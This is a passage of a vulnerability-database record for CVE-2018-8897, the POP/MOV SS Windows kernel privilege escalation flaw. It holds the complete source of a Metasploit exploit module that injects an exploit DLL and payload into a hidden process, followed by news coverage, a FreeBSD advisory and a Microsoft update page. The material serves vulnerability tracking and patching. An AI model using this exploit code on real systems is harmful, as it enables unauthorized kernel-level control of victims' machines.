\nattr_reader :exploit_path \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/148549/mov_ss.rb.txt"}], "metasploit": [{"lastseen": "2020-09-20T17:40:37", "description": "This module exploits a vulnerability in a statement in the system programming guide of the Intel 64 and IA-32 architectures software developer's manual being mishandled in various operating system kerneles, resulting in unexpected behavior for #DB excpetions that are deferred by MOV SS or POP SS. This module will upload the pre-compiled exploit and use it to execute the final payload in order to gain remote code execution.\n", "published": "2018-07-13T06:11:37", "type": "metasploit", "title": "Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8897"], "modified": "2020-06-22T11:48:39", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/MOV_SS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/post/common'\nrequire 'msf/core/post/file'\nrequire 'msf/core/post/windows/priv'\nrequire 'msf/core/post/windows/registry'\nrequire 'msf/core/exploit/exe'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::Common\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Exploit::EXE\n include Msf::Post::Windows::ReflectiveDLLInjection\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability',\n 'Description' => %q(\n This module exploits a vulnerability in a statement in the system programming guide\n of the Intel 64 and IA-32 architectures software developer's manual being mishandled\n in various operating system kerneles, resulting in unexpected behavior for #DB\n excpetions that are deferred by MOV SS or POP SS.\n\n This module will upload the pre-compiled exploit and use it to execute the final\n payload in order to gain remote code execution.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Nick Peterson', # Original discovery (@nickeverdox)\n 'Nemanja Mulasmajic', # Original discovery (@0xNemi)\n 'Can B\u00f6l\u00fck <can1357>', # PoC\n 'bwatters-r7' # msf module\n ],\n 'Platform' => ['win'],\n 'SessionTypes' => ['meterpreter'],\n 'Targets' =>\n [\n ['Windows x64', { 'Arch' => ARCH_X64 }]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'May 08 2018',\n 'References' =>\n [\n ['CVE', '2018-8897'],\n ['EDB', '44697'],\n ['BID', '104071'],\n ['URL', 'https://github.com/can1357/CVE-2018-8897/'],\n ['URL', 'https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/']\n ],\n 'DefaultOptions' =>\n {\n 'DisablePayloadHandler' => false\n }\n ))\n\n register_options([\n OptBool.new('USE_INJECTION',\n [true, 'Use in-memory dll injection rather than exe file uploads.', true]),\n OptString.new('EXPLOIT_NAME',\n [false, 'The filename to use for the exploit binary if USE_INJECTION=false (%RAND% by default).', nil]),\n OptString.new('PAYLOAD_NAME',\n [false, 'The filename for the payload to be used on the target host if USE_INJECTION=false (%RAND%.exe by default).', nil]),\n OptString.new('PATH',\n [false, 'Path to write binaries if if USE_INJECTION=false(%TEMP% by default).', nil]),\n OptInt.new('EXECUTE_DELAY',\n [false, 'The number of seconds to delay before executing the exploit if USE_INJECTION=false', 3])\n ])\n end\n\n def setup_process\n begin\n print_status('Launching notepad to host the exploit...')\n notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)\n process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{process.pid} launched.\")\n rescue Rex::Post::Meterpreter::RequestError\n # Sandboxes could not allow to create a new process\n # stdapi_sys_process_execute: Operation failed: Access is denied.\n print_error('Operation failed. Trying to elevate the current process...')\n process = client.sys.process.open\n end\n process\n end\n\n def setup\n super\n @exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))\n @payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))\n @exploit_name = \"#{exploit_name}.exe\" unless exploit_name.match(/\\.exe$/i)\n @payload_name = \"#{payload_name}.exe\" unless payload_name.match(/\\.exe$/i)\n @temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')\n @payload_path = \"#{temp_path}\\\\#{payload_name}\"\n @exploit_path = \"#{temp_path}\\\\#{exploit_name}\"\n @payload_exe = generate_payload_exe\n end\n\n def inject_magic(process)\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-8897', 'reflective_dll.x64.dll')\n library_path = ::File.expand_path(library_path)\n\n print_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\")\n dll = ''\n ::File.open(library_path, 'rb') { |f| dll = f.read }\n\n exploit_mem, offset = inject_dll_data_into_process(process, dll)\n\n print_status(\"Exploit injected. Injecting payload into #{process.pid}...\")\n payload_mem = inject_into_process(process, payload.encoded)\n\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation.\n print_status('Payload injected. Executing exploit...')\n process.thread.create(exploit_mem + offset, payload_mem)\n end\n\n def validate_active_host\n begin\n print_status(\"Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}\")\n rescue Rex::Post::Meterpreter::RequestError => e\n elog(e)\n raise Msf::Exploit::Failed, 'Could not connect to session'\n end\n end\n\n def validate_remote_path(path)\n unless directory?(path)\n fail_with(Failure::Unreachable, \"#{path} does not exist on the target\")\n end\n end\n\n def validate_target\n if sysinfo['Architecture'] == ARCH_X86\n fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')\n end\n if sysinfo['OS'] =~ /XP/\n fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')\n end\n end\n\n def ensure_clean_destination(path)\n if file?(path)\n print_status(\"#{path} already exists on the target. Deleting...\")\n begin\n file_rm(path)\n print_status(\"Deleted #{path}\")\n rescue Rex::Post::Meterpreter::RequestError => e\n elog(e)\n print_error(\"Unable to delete #{path}\")\n end\n end\n end\n\n def ensure_clean_exploit_destination\n ensure_clean_destination(exploit_path)\n end\n\n def ensure_clean_payload_destination\n ensure_clean_destination(payload_path)\n end\n\n def upload_exploit\n local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-8897', 'cve-2018-8897-exe.exe')\n upload_file(exploit_path, local_exploit_path)\n print_status(\"Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}\")\n end\n\n def upload_payload\n write_file(payload_path, payload_exe)\n print_status(\"Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}\")\n end\n\n def execute_exploit\n sleep(datastore['EXECUTE_DELAY'])\n print_status(\"Running exploit #{exploit_path} with payload #{payload_path}\")\n output = cmd_exec('cmd.exe', \"/c #{exploit_path} #{payload_path}\")\n vprint_status(output)\n end\n\n def exploit_dll\n begin\n print_status('Checking target...')\n validate_active_host\n validate_target\n print_status('Target Looks Good... trying to start notepad')\n process = setup_process\n inject_magic(process)\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n rescue Rex::Post::Meterpreter::RequestError => e\n elog(e)\n print_error(e.message)\n end\n end\n\n def exploit_exe\n begin\n validate_remote_path(temp_path)\n ensure_clean_exploit_destination\n ensure_clean_payload_destination\n upload_exploit\n upload_payload\n execute_exploit\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n rescue Rex::Post::Meterpreter::RequestError => e\n elog(e)\n print_error(e.message)\n ensure_clean_exploit_destination\n ensure_clean_payload_destination\n end\n end\n\n def exploit\n begin\n validate_active_host\n validate_target\n if datastore['USE_INJECTION']\n exploit_dll\n else\n exploit_exe\n end\n end\n end\n\n attr_reader :exploit_name\n attr_reader :payload_name\n attr_reader :payload_exe\n attr_reader :temp_path\n attr_reader :payload_path\n attr_reader :exploit_path\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/mov_ss.rb"}], "threatpost": [{"lastseen": "2019-04-25T05:49:58", "bulletinFamily": "info", "cvelist": ["CVE-2018-8897"], "description": "Multiple operating system vendors issued coordinated patches this week to address a common vulnerability across their platforms, which was introduced thanks to widespread misinterpretation of Intel developer documentation.\n\nAccording to the CERT/CC team, [most major players](<https://www.kb.cert.org/vuls/byvendor?searchview&Query=FIELD+Reference=631579&SearchOrder=4>) (including Apple, FreeBSD, Microsoft, Red Hat, Ubuntu, VMWare and Xen, plus distros based on the Linux Kernel OS) built an uncannily similar privilege escalation flaw into their Intel-based products.\n\nThe flaw isn\u2019t remotely exploitable \u2013 a bad actor would need to gain local access to the victim\u2019s machine via malware or stolen credentials. But once in, CERT/CC explained that an attacker armed with OS APIs could access sensitive memory information, and also \u201ccontrol low-level OS functions\u201d by gaining elevated access privileges to the kernel level \u2013 i.e., hijack the code that controls the PC, Mac or VM.\n\nFrom there, Microsoft [explained](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8897>), it\u2019s possible to install programs and malware; view, change or delete data; or create new accounts with full user rights.\n\nOn the more innocuous end of the threat-level spectrum, the issue can also simply crash the kernel by confusing the system, causing a denial-of-service state.\n\nOn the more technical front, the flaw ([CVE-2018-8897](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8897>)) resides in a debug exception in the x86-64 architectures. To be clear, the issue doesn\u2019t exist in the chip itself, but rather in the way developers have built their software stacks to interact with the processor.\n\nAs Red Hat explained, modern processors provide debugging infrastructure, used by system designers and application developers to debug their software and monitor events, including memory access (read or write), instruction execution and I/O port access.\n\n\u201cWhen such an event occurs during program execution, the processor raises a Debug Exception (#DB) to transfer execution control to debugging software,\u201d the company said in its [overview](<https://access.redhat.com/security/vulnerabilities/pop_ss>) of the flaw. \u201cThis catches the debug exception and allows a developer to examine program execution state.\u201d\n\nDevelopers appear to have widely misunderstood the way Intel processors handle that exception, leading to the same issue popping up across the computing landscape.\n\n\u201cThe error appears to be due to developer interpretation of existing documentation for certain Intel architecture interrupt/exception instructions, namely MOV to SS and POP to SS,\u201d CERT/CC said.\n\nThe CERT/CC team explained the problem in an [advisory](<https://www.kb.cert.org/vuls/id/631579>): \u201cIn certain circumstances, after the use of certain Intel x86-64 architecture instructions, a debug exception pointing to data in a lower ring (for most operating systems, the kernel Ring 0 level) is made available to operating system components running in Ring 3.\u201d\n\nNick Peterson of Everdox Tech, who first uncovered the vulnerability, pointed the finger at what he said was Intel\u2019s lack of clarity in its instruction manual. In a [technical brief](<http://everdox.net/popss.pdf>), he noted, \u201cThis is a serious security vulnerability and oversight made by operating system vendors due to unclear and perhaps even incomplete documentation.\u201d\n\nWe reached out to Intel and received an official statement:\n\n_\u201cThe security of our customers and partners is important to us. __To help ensure clear communication with the developer community, we __are updating our [Software Developers Manual](<https://software.intel.com/en-us/articles/intel-sdm>)__ (SDM) with clarifying language on the secure use of the POP/MOV-SS instructions. We recommend that system software vendors evaluate their software to confirm their products handle the situations in question. More information is available [here](<https://www.kb.cert.org/vuls/id/631579>)__.\u201d_\n\nCreating secure computing environments obviously takes coordination between the chipmaker, software developers and vendors; however, there are always blind spots. In this case, once the chip is out the door, Intel has no visibility or control over how developers build software to use its silicon.\n", "modified": "2018-05-10T15:37:07", "published": "2018-05-10T15:37:07", "id": "THREATPOST:1C410BC5122B196A58BBDDCDA7A79983", "href": "https://threatpost.com/major-os-players-misinterpret-intel-docs-and-now-kernels-can-be-hijacked/131869/", "type": "threatpost", "title": "Major OS Players Misinterpret Intel Docs, and Now Kernels Can Be Hijacked", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2019-05-29T18:31:56", "bulletinFamily": "unix", "cvelist": ["CVE-2018-8897"], "description": "\nProblem Description:\nThe MOV SS and POP SS instructions inhibit debug exceptions\n\tuntil the instruction boundary following the next instruction.\n\tIf that instruction is a system call or similar instruction\n\tthat transfers control to the operating system, the debug\n\texception will be handled in the kernel context instead of\n\tthe user context.\nImpact:\nAn authenticated local attacker may be able to read\n\tsensitive data in kernel memory, control low-level operating\n\tsystem functions, or may panic the system.\n", "edition": 5, "modified": "2018-05-08T00:00:00", "published": "2018-05-08T00:00:00", "id": "521CE804-52FD-11E8-9123-A4BADB2F4699", "href": "https://vuxml.freebsd.org/freebsd/521ce804-52fd-11e8-9123-a4badb2f4699.html", "title": "FreeBSD -- Mishandling of x86 debug exceptions", "type": "freebsd", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2019-01-23T20:50:12", "bulletinFamily": "blog", "cvelist": ["CVE-2018-8897"], "description": "In a memorable [scene](<https://www.youtube.com/watch?v=iyHNryKojDY>) from \u201cJumpin\u2019 Jack Flash,\u201d Whoopi Goldberg struggles to understand the lyrics of the eponymous song from the Rolling Stones, as she pleads: \u201cMick, Mick, Mick, speak English!\u201d\n\nIt appears that multiple operating system vendors had similar trouble interpreting Intel and AMD debugging documentation, which led the OS vendors to independently create the same critical security flaw in their respective kernel software.\n\n\n\nThe issue came to light last week when US-CERT (United States Computer Emergency Readiness Team) [warned](<https://www.kb.cert.org/vuls/id/631579>) that under certain circumstances \u201csome operating systems or hypervisors may not expect or properly handle an Intel architecture hardware debug exception.\u201d\n\n\u201cThe error appears to be due to developer interpretation of existing documentation for certain Intel architecture interrupt/exception instructions, namely MOV to SS and POP to SS,\u201d the CERT alert reads.\n\nThe list of OS vendors affected reads like an industry \u201cwho\u2019s who.\u201d It includes Apple, Microsoft, Red Hat, VMware, Ubuntu, Xen and SUSE Linux. The problem was discovered by researcher Nick Peterson of Everdox Tech, who has detailed the flaw in a [paper](<https://everdox.net/popss.pdf>) titled \u201cPOP SS/MOV SS Vulnerability.\u201d\n\n\u201cThis is a serious security vulnerability and oversight made by operating system vendors due to unclear and perhaps even incomplete documentation on the caveats of the POP SS and MOV SS instructions and their interactions with interrupt gate semantics,\u201d wrote Peterson and co-author Nemanja Mulasmajic from Triplefault.io.\n\nIf exploited, the vulnerability ([CVE-2018-8897](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8897>)), which each affected vendor has now patched, could allow attackers to create a variety of problems, including crashing the impacted system, running malicious programs on it, and tampering with data.\n\n\u201cAn authenticated attacker may be able to read sensitive data in memory or control low-level operating system functions,\u201d reads the CERT advisory.\n\nAccording to [Microsoft](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8897>), successful attackers would need to log on to the system, and run a specially-crafted application to take control of it. They could then run arbitrary code in kernel mode and \u201cinstall programs; view, change, or delete data; or create new accounts with full user rights.\u201d\n\nMore information is available from [Red Hat](<https://access.redhat.com/security/vulnerabilities/pop_ss>) and [VMware](<https://kb.vmware.com/s/article/54988>).\n\n### In other security news \u2026\n\n * There are reports of new \u201ctext bombs\u201d that can crash mobile apps like iMessage and Whatsapp, as well as iPhones and Android devices, but their impact has been greatly exaggerated, according to independent security analyst [Graham Cluley](<https://hotforsecurity.bitdefender.com/blog/text-bombs-and-black-dots-of-death-plague-whatsapp-and-imessage-users-19891.html#new_tab>). \n * The source code for the TreasureHunter malware has been leaked, which will help researchers better understand but which may trigger the creation of new variants, [reports](<https://threatpost.com/pos-malware-treasurehunter-source-code-leaked/131891/>) Tom Spring in ThreatPost.\n * LG has patched a pair of \u201csevere\u201d vulnerabilities affecting its smartphones' keyboards, [according to ThreatPost\u2019s Tara Seals](<https://threatpost.com/severe-keyboard-flaws-in-lg-smartphones-allow-remote-code-execution/131829/>).", "modified": "2018-05-14T18:47:42", "published": "2018-05-14T18:47:42", "id": "QUALYSBLOG:12D0AED8A6507BA497CB8CC165A00D0A", "href": "https://blog.qualys.com/news/2018/05/14/what-weve-got-here-is-failure-to-communicate-os-vendors-misread-cpu-docs-create-flaw", "type": "qualysblog", "title": "What we\u2019ve got here is failure to communicate: OS vendors misread CPU docs, create flaw", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mskb": [{"lastseen": "2019-09-11T12:39:12", "bulletinFamily": "microsoft", "cvelist": ["CVE-2018-8174", "CVE-2018-8897"], "description": "<html><body><p>Resolves vulnerabilities in Windows Server 2008, Windows Embedded POSReady 2009, and Windows Embedded Standard 2009.</p><h2>Summary</h2><div class=\"kb-summary-section section\"><p>An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory.<br/>A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory.\u00a0<br/><br/>To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE).</p><ul class=\"sbody-free_list\"><li><a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8174\" id=\"kb-link-2\" target=\"_self\">CVE-2018-8174</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8897\" id=\"kb-link-2\" target=\"_self\">CVE-2018-8897</a></li></ul></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><strong>Important\u00a0</strong>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>.</div><h2>How to obtain and install the update</h2><div class=\"kb-resolution-section section\"> <h3 class=\"sbody-h3\">Method 1: Windows Update</h3><div class=\"kb-collapsible kb-collapsible-expanded\">This update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see <a href=\"https://www.microsoft.com/en-us/safety/pc-security/updates.aspx\" id=\"kb-link-13\" target=\"_self\">Windows Update: FAQ</a>. </div><h3 class=\"sbody-h3\">Method 2: Microsoft Update Catalog</h3><div class=\"kb-collapsible kb-collapsible-expanded\">To get the stand-alone package for this update, go to the <a href=\"http://catalog.update.microsoft.com/v7/site/search.aspx?q=4134651\" id=\"kb-link-14\" target=\"_self\">Microsoft Update Catalog</a> website. <br/></div></div><h2>Deployment information</h2>For deployment details for this security update, go to the following article in the Microsoft Knowledge Base:<br/> <div class=\"indent\"> <a href=\"https://support.microsoft.com/en-us/help/20180508\" id=\"kb-link-9\">Security update deployment information: May 08, 2018</a></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></td></tr><tr><td faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-15\" target=\"_self\">Windows Update: FAQ</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-16\" target=\"_self\">TechNet Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-17\" target=\"_self\">Microsoft Secure</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-18\" target=\"_self\">International Support</a></div><br/></span></td></tr></tbody></table><a class=\"bookmark\" id=\"fileinfo\"></a></div><h2>File Information</h2><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">File hash information</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><th>File name</th><th>SHA1 hash</th><th>SHA256 hash</th></tr><tr><td>Windows6.0-KB4134651-ia64.msu</td><td>FCFD12B7D19CCEF827F086FB3D5BCD961723363E</td><td>3E8EC96351AA00649BB98A8A72C5E8AEAE5EBC4E9E3E62A8E7D447F7C039D075</td></tr><tr><td>Windows6.0-KB4134651-x86.msu</td><td>C3102BEDCA9F6D9C1EA29732F8B2D832355E01E9</td><td>C307567AEFACA32665DF458BEE9A10D5541D03644CAF8A3C0C636184EAB4A751</td></tr><tr><td>Windows6.0-KB4134651-x64.msu</td><td>55BD8538E452DB8FD330A88666E13151F5DE8334</td><td>14F8A210905C5F2CB1712F2C7E61F45294879E9661CDCE7BDCDA64D48DD5197A</td></tr><tr><td>WindowsXP-KB4134651-x86-Embedded-ENU.exe</td><td>BA2C6637491967E459B9F24B9939618DBCDC8978</td><td>7BD6C9443E70DE7FBB66E83B38032A0222E94E1AADDC6056D135C2C4FEBB77FE</td></tr></tbody></table></td></tr></tbody></table><p><br/><strong>File information</strong><br/><br/><span>The English (United States) version of this software update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.</span><br/><br/><strong>Windows Server 2008 file information</strong></p><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"alert-title\">Notes</div><div class=\"row\"><div class=\"col-xs-24\"><p>The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.</p></div></div></div></div><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">For all supported ia64-based versions</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td><td><strong class=\"sbody-strong\">Service branch</strong></td></tr><tr><td>Hal.dll</td><td>6.0.6002.24367</td><td>428,224</td><td>28-Apr-2018</td><td>02:42</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>373,760</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>255,488</td><td>28-Apr-2018</td><td>02:27</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,536</td><td>28-Apr-2018</td><td>04:33</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>352,768</td><td>28-Apr-2018</td><td>04:24</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>349,696</td><td>28-Apr-2018</td><td>04:11</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>346,624</td><td>28-Apr-2018</td><td>04:17</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>338,944</td><td>28-Apr-2018</td><td>04:30</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll</td><td>6.0.6002.24367</td><td>1,980,416</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Setbcdlocale.dll</td><td>6.0.6002.24367</td><td>143,360</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Winload.efi</td><td>6.0.6002.24367</td><td>1,980,096</td><td>28-Apr-2018</td><td>02:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>27,136</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>02:25</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:30</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>25,600</td><td>28-Apr-2018</td><td>04:20</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>25,600</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>25,088</td><td>28-Apr-2018</td><td>04:15</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>25,088</td><td>28-Apr-2018</td><td>04:28</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi</td><td>6.0.6002.24367</td><td>1,980,096</td><td>28-Apr-2018</td><td>02:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>9,728</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>9,216</td><td>28-Apr-2018</td><td>02:26</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>9,728</td><td>28-Apr-2018</td><td>04:31</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>7,680</td><td>28-Apr-2018</td><td>04:23</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll</td><td>6.0.6002.24259</td><td>215,784</td><td>15-Dec-2017</td><td>14:06</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Driver.stl</td><td>Not applicable</td><td>4,349</td><td>15-Dec-2017</td><td>14:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll</td><td>6.0.6002.24367</td><td>4,194,304</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>IA64_MICROSOFT-WINDOWS-COM-BASE-QFE</td></tr><tr><td>Rpcss.dll</td><td>6.0.6002.24367</td><td>1,220,096</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>IA64_MICROSOFT-WINDOWS-COM-BASE-QFE</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>23,040</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>02:24</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>02:26</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:29</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>24,064</td><td>28-Apr-2018</td><td>04:31</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:20</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>13,824</td><td>28-Apr-2018</td><td>04:21</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>12,800</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:14</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>9,728</td><td>28-Apr-2018</td><td>04:16</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:27</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>9,728</td><td>28-Apr-2018</td><td>04:29</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Comcat.dll</td><td>6.0.6002.24367</td><td>13,312</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Oleres.dll</td><td>6.0.6002.24367</td><td>23,552</td><td>28-Apr-2018</td><td>02:00</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Csrsrv.dll</td><td>6.0.6002.24367</td><td>150,016</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Kernel32.dll</td><td>6.0.6002.24367</td><td>2,193,920</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>250,880</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>23,552</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not 